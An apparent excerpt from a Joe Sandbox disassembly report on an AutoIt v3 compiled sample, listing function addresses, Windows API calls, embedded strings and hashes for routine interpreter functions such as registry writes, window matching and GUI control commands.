Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: ffe2a49105e94b33b878dd14bc77f3c76499285a5ea15bfc45cd0223720b26ee
Instruction ID: b6e02368beb4436485c2eb9c026431c79c58b84ae7e78c214fb2b7e0f7c1714e
Opcode Fuzzy Hash: ffe2a49105e94b33b878dd14bc77f3c76499285a5ea15bfc45cd0223720b26ee
Instruction Fuzzy Hash: 4AB16E71A5020A9FDF14DFA8EC49BAD7BB8FB08314F114229FA56A7290DB74D860CF51

Function 00283639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00283735
RegCreateKeyExW.ADVAPI32(?,?,00000000,002BDC00,00000000,?,00000000,?,?), ref: 002837A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002837EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00283874
RegCloseKey.ADVAPI32(?), ref: 00283B94
RegCloseKey.ADVAPI32(00000000), ref: 00283BA1

Strings

REG_QWORD, xrefs: 00283AE2
REG_EXPAND_SZ, xrefs: 00283811
REG_BINARY, xrefs: 00283B2F
REG_MULTI_SZ, xrefs: 0028395C
REG_DWORD, xrefs: 00283A65
REG_SZ, xrefs: 002838B2

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: ca0fc951a3d32b88203d85e6a22d25b59b7b2339872c86d40844545983469724
Instruction ID: 471410a5091530496e39a36b1cb35d4bf14b055f84bc29bb80c297c1a9b21e8f
Opcode Fuzzy Hash: ca0fc951a3d32b88203d85e6a22d25b59b7b2339872c86d40844545983469724
Instruction Fuzzy Hash: 5A027A75220611AFCB14EF14D895A2AB7E5FF88720F04845DF98A9B3A1CB30ED65CF85

Function 00286BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00286C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00286D16

Strings

GETSELECTEDCOUNT, xrefs: 00286CF9
GETTEXT, xrefs: 00286CBF
SELECTALL, xrefs: 00286D75
SELECT, xrefs: 00286DA8
VIEWCHANGE, xrefs: 00286ECD
SELECTINVERT, xrefs: 00286DDE
ISSELECTED, xrefs: 00286D21
GETITEMCOUNT, xrefs: 00286C84
GETSUBITEMCOUNT, xrefs: 00286CA1
DESELECT, xrefs: 00286DFC
FINDITEM, xrefs: 00286E81
SELECTCLEAR, xrefs: 00286D8D
GETSELECTED, xrefs: 00286E3C

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 02e0ceeac360a21890d25d6c8f529cd3d2699055db4b43c7e7c0e698ec1eb718
Instruction ID: e3037792cde589aaa9221b22c6dff59872ef8784f8b47af06af8be4393b675cd
Opcode Fuzzy Hash: 02e0ceeac360a21890d25d6c8f529cd3d2699055db4b43c7e7c0e698ec1eb718
Instruction Fuzzy Hash: CAA18B742343429FCB14FF20D855A6AB3A5BF44714F14496AB896AB3D2DB70EC2ACF41

Function 0025CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0025CF91
__swprintf.LIBCMT ref: 0025D032
_wcscmp.LIBCMT ref: 0025D045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0025D09A
_wcscmp.LIBCMT ref: 0025D0D6
GetClassNameW.USER32(?,?,00000400), ref: 0025D10D
GetDlgCtrlID.USER32(?), ref: 0025D15F
GetWindowRect.USER32(?,?), ref: 0025D195
GetParent.USER32(?), ref: 0025D1B3
ScreenToClient.USER32(00000000), ref: 0025D1BA
GetClassNameW.USER32(?,?,00000100), ref: 0025D234
_wcscmp.LIBCMT ref: 0025D248
GetWindowTextW.USER32(?,?,00000400), ref: 0025D26E
_wcscmp.LIBCMT ref: 0025D282

Strings

%s%u, xrefs: 0025D02C

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: e92629f28b8a2c6033f65453963a89e79be0dbdfd1e0da71148a806022ca94a8
Instruction ID: 4546f86727237dc5c089d6ee5a758f12381a956ce556950ce2ac69a5369a5b7d
Opcode Fuzzy Hash: e92629f28b8a2c6033f65453963a89e79be0dbdfd1e0da71148a806022ca94a8
Instruction Fuzzy Hash: FCA1E231224703AFD728DF64C884FAAB7A8FF44315F10851AFD9AD2191DB30E969CB95

Function 0025D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0025D8EB
_wcscmp.LIBCMT ref: 0025D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0025D924
CharUpperBuffW.USER32(?,00000000), ref: 0025D941
_wcscmp.LIBCMT ref: 0025D95F
_wcsstr.LIBCMT ref: 0025D970
GetClassNameW.USER32(00000018,?,00000400), ref: 0025D9A8
_wcscmp.LIBCMT ref: 0025D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0025D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 0025DA28
_wcscmp.LIBCMT ref: 0025DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 0025DA60
GetWindowRect.USER32(00000004,?), ref: 0025DAC9

Strings

@, xrefs: 0025D8C6
ThumbnailClass, xrefs: 0025D9B3, 0025DA33

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: d8c1d94ba6b15858ad0e81f99cb88c05e6e46c9a423c3ea2293c7c160cdf85a8
Instruction ID: f19f85e6bd2bfe14c94d8c778fcb77ad506e3dde9b936713af7854b9ae46502b
Opcode Fuzzy Hash: d8c1d94ba6b15858ad0e81f99cb88c05e6e46c9a423c3ea2293c7c160cdf85a8
Instruction Fuzzy Hash: A38128310283069FDB24DF50D884FAA7BE8FF44709F04446AFD899A092DB30DD69CBA5

Function 0025D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0025D753

Strings

ACTIVE, xrefs: 0025D72E
REGEXP=, xrefs: 0025D768
[HANDLE:, xrefs: 0025D75F
[CLASS:, xrefs: 0025D7A3
HANDLE=, xrefs: 0025D74C
[LAST, xrefs: 0025D800
[ACTIVE, xrefs: 0025D740
LAST, xrefs: 0025D718
ALL, xrefs: 0025D7E7
CLASSNAME=, xrefs: 0025D790
[REGEXPTITLE:, xrefs: 0025D77B
[ALL, xrefs: 0025D7F9

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 08abce192ae61d70d462d34b4941c373a55c2e27a69dc0b2b5e49e9af3fee0d3
Instruction ID: 152bda254c3ebb034d8724baef94f2f003f27b0b59bdc26cf58cd5628941ba4d
Opcode Fuzzy Hash: 08abce192ae61d70d462d34b4941c373a55c2e27a69dc0b2b5e49e9af3fee0d3
Instruction Fuzzy Hash: E431CF31674205EADB24EEA0ED43FADB3659F21315F20012AF841711D1EFB1AE7CCA19

Function 0025EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0025EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0025EAC2
SetWindowTextW.USER32(?,?), ref: 0025EAD9
GetDlgItem.USER32(?,000003EA), ref: 0025EAEE
SetWindowTextW.USER32(00000000,?), ref: 0025EAF4
GetDlgItem.USER32(?,000003E9), ref: 0025EB04
SetWindowTextW.USER32(00000000,?), ref: 0025EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0025EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0025EB45
GetWindowRect.USER32(?,?), ref: 0025EB4E
SetWindowTextW.USER32(?,?), ref: 0025EBB9
GetDesktopWindow.USER32 ref: 0025EBBF
GetWindowRect.USER32(00000000), ref: 0025EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0025EC12
GetClientRect.USER32(?,?), ref: 0025EC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0025EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0025EC6F

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 64245af99c0954fde68ed3078a1e1bb072f7990cd5699b253908c8cf30455221
Instruction ID: 2dec8072239dafff3ba940d1198f2420d492f20dd68769402b5ddcef4aecd31f
Opcode Fuzzy Hash: 64245af99c0954fde68ed3078a1e1bb072f7990cd5699b253908c8cf30455221
Instruction Fuzzy Hash: 8F516E7190070AEFDB24DFA8DD89B6EBBF9FF04706F014918E546A25A0CB74A958CF04

Function 002779B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 002779C6
LoadCursorW.USER32(00000000,00007F00), ref: 002779D1
LoadCursorW.USER32(00000000,00007F03), ref: 002779DC
LoadCursorW.USER32(00000000,00007F8B), ref: 002779E7
LoadCursorW.USER32(00000000,00007F01), ref: 002779F2
LoadCursorW.USER32(00000000,00007F81), ref: 002779FD
LoadCursorW.USER32(00000000,00007F88), ref: 00277A08
LoadCursorW.USER32(00000000,00007F80), ref: 00277A13
LoadCursorW.USER32(00000000,00007F86), ref: 00277A1E
LoadCursorW.USER32(00000000,00007F83), ref: 00277A29
LoadCursorW.USER32(00000000,00007F85), ref: 00277A34
LoadCursorW.USER32(00000000,00007F82), ref: 00277A3F
LoadCursorW.USER32(00000000,00007F84), ref: 00277A4A
LoadCursorW.USER32(00000000,00007F04), ref: 00277A55
LoadCursorW.USER32(00000000,00007F02), ref: 00277A60
LoadCursorW.USER32(00000000,00007F89), ref: 00277A6B
GetCursorInfo.USER32(?), ref: 00277A7B

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: bc350b72df381a5f3e27f1b01d48a92e5130545f571896b723cbe038585d9639
Instruction ID: 4cd42c7673d6c10fb56102d8d0f8d9fc363777716fbb15e20934b176ee0f9dfb
Opcode Fuzzy Hash: bc350b72df381a5f3e27f1b01d48a92e5130545f571896b723cbe038585d9639
Instruction Fuzzy Hash: F33105B1D5831AAADB109FB69C8995FBFE8FF04750F50453AA50DE7280DA78A5008FA1

Function 0022C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 0023E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0022C8B7,?,00002000,?,?,00000000,?,0022419E,?,?,?,002BDC00), ref: 0023E984

Part of subcall function 0022660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002253B1,?,?,002261FF,?,00000000,00000001,00000000), ref: 0022662F

__wsplitpath.LIBCMT ref: 0022C93E

Part of subcall function 00241DFC: __wsplitpath_helper.LIBCMT ref: 00241E3C

_wcscpy.LIBCMT ref: 0022C953
_wcscat.LIBCMT ref: 0022C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0022C978
SetCurrentDirectoryW.KERNEL32(?), ref: 0022CABE

Part of subcall function 0022B337: _wcscpy.LIBCMT ref: 0022B36F

Strings

EA06, xrefs: 002930C9
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00293098
AU3!, xrefs: 0022C90C
Bad directive syntax error, xrefs: 00293429
Unterminated string, xrefs: 00293470
Error opening the file, xrefs: 002930B4, 0029313D
>>>AUTOIT SCRIPT<<<, xrefs: 0029311B

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: 38197ed9ad55a6b28dfd0854285a77c15d4da6df67a3a82dbad38830e8c94c40
Instruction ID: 9e7a5695463a94e77d6b7efd532d6beae37841b1d6ad5bad355ee02deea9bcc3
Opcode Fuzzy Hash: 38197ed9ad55a6b28dfd0854285a77c15d4da6df67a3a82dbad38830e8c94c40
Instruction Fuzzy Hash: C812D271528341AFCB24EF64D881AAFB7E4BF99304F50491EF48993261DB30DA69CF52

Function 0028CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0028CEFB
DestroyWindow.USER32(?,?), ref: 0028CF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0028CFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0028D016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0028D025
DestroyWindow.USER32(?), ref: 0028D042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00220000,00000000), ref: 0028D075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0028D094
GetDesktopWindow.USER32 ref: 0028D0A9
GetWindowRect.USER32(00000000), ref: 0028D0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0028D0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0028D0DA

Part of subcall function 0023B526: GetWindowLongW.USER32(?,000000EB), ref: 0023B537

Strings

tooltips_class32, xrefs: 0028CFED, 0028D06E
0, xrefs: 0028CF1B

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: 55d5806047a5fa63c346ad3f97903019c917f1c168b49ebab57f1fd2112bfb74
Instruction ID: 5581f64948bffed2d32d8cb7facefa5cbe9634729e0f290a73ab003a60de5aee
Opcode Fuzzy Hash: 55d5806047a5fa63c346ad3f97903019c917f1c168b49ebab57f1fd2112bfb74
Instruction Fuzzy Hash: 64710274160306AFD724DF28DC88F6677E9EB89704F44451DF985872E1DB70E866CB22

Function 0028F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0023B34E: GetWindowLongW.USER32(?,000000EB), ref: 0023B35F

DragQueryPoint.SHELL32(?,?), ref: 0028F37A

Part of subcall function 0028D7DE: ClientToScreen.USER32(?,?), ref: 0028D807
Part of subcall function 0028D7DE: GetWindowRect.USER32(?,?), ref: 0028D87D
Part of subcall function 0028D7DE: PtInRect.USER32(?,?,0028ED5A), ref: 0028D88D

SendMessageW.USER32(?,000000B0,?,?), ref: 0028F3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0028F3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0028F411
_wcscat.LIBCMT ref: 0028F441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0028F458
SendMessageW.USER32(?,000000B0,?,?), ref: 0028F471
SendMessageW.USER32(?,000000B1,?,?), ref: 0028F488
SendMessageW.USER32(?,000000B1,?,?), ref: 0028F4AA
DragFinish.SHELL32(?), ref: 0028F4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0028F59C

Strings

@GUI_DRAGID, xrefs: 0028F510
@GUI_DROPID, xrefs: 0028F4D1
@GUI_DRAGFILE, xrefs: 0028F54B

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 3aba64fb76df8ee04eec65d31c8c470a0cccd6033094be7c2393d29266ab7fd3
Instruction ID: 55ad9491be968eade1c5060753381294c0d7d74055ac779a5414d8be76f75e3c
Opcode Fuzzy Hash: 3aba64fb76df8ee04eec65d31c8c470a0cccd6033094be7c2393d29266ab7fd3
Instruction Fuzzy Hash: 50615C71118300AFC305EF64EC89D9FBBF8EF89710F400A1EF695961A1DB709A29CB52

Function 0026AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0026AB3D
VariantCopy.OLEAUT32(?,?), ref: 0026AB46
VariantClear.OLEAUT32(?), ref: 0026AB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0026AC40
__swprintf.LIBCMT ref: 0026AC70
VarR8FromDec.OLEAUT32(?,?), ref: 0026AC9C
VariantInit.OLEAUT32(?), ref: 0026AD4D
SysFreeString.OLEAUT32(00000016), ref: 0026ADDF
VariantClear.OLEAUT32(?), ref: 0026AE35
VariantClear.OLEAUT32(?), ref: 0026AE44
VariantInit.OLEAUT32(00000000), ref: 0026AE80

Strings

Default, xrefs: 0026ACFD
%4d%02d%02d%02d%02d%02d, xrefs: 0026AC6A

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: a85c373517a8160dd820e3d383bc109cc6075819a3c0562f856e12dce1df8b8a
Instruction ID: 0dd7e7bff257bba50d014bac26eaead1cedd12e82834f1fcdb9368b4c1f107f5
Opcode Fuzzy Hash: a85c373517a8160dd820e3d383bc109cc6075819a3c0562f856e12dce1df8b8a
Instruction Fuzzy Hash: 31D1C171A24216EBCB109F69D885B6EF7B5FF05700F248465E405AB181DBB4ECE0DFA2

Function 0028716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002871FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00287247

Strings

GETTOTALCOUNT, xrefs: 0028722A
GETITEMCOUNT, xrefs: 00287311
GETTEXT, xrefs: 00287382
EXPAND, xrefs: 002872E1
UNCHECK, xrefs: 0028740B
COLLAPSE, xrefs: 0028728D
ISCHECKED, xrefs: 002873B2
SELECT, xrefs: 002873E0
CHECK, xrefs: 00287267
EXISTS, xrefs: 002872B0
GETSELECTED, xrefs: 0028733F

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: f77447eeffa92e0d06b9d593cff71d5804698c9449c604f69fcb7bb6fb576531
Instruction ID: e61a21a501f504c483a0aa6ea54c2997e8f13578ac5f25c00cfa01551cfdbe1d
Opcode Fuzzy Hash: f77447eeffa92e0d06b9d593cff71d5804698c9449c604f69fcb7bb6fb576531
Instruction Fuzzy Hash: 83915E742247019BCB04FF10C851A6EB7A5AF54710F214899F8966B3E3DB70ED6ACF85

Function 0025CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0025CF50), ref: 0025CE90

Strings

CLASS, xrefs: 0025CC10
INSTANCE, xrefs: 0025CD9E
H+-, xrefs: 0025CCE8
NAME, xrefs: 0025CCC2
REGEXPCLASS, xrefs: 0025CC56
TEXT, xrefs: 0025CDC7
L+-, xrefs: 0025CD14
T+-, xrefs: 0025CD72
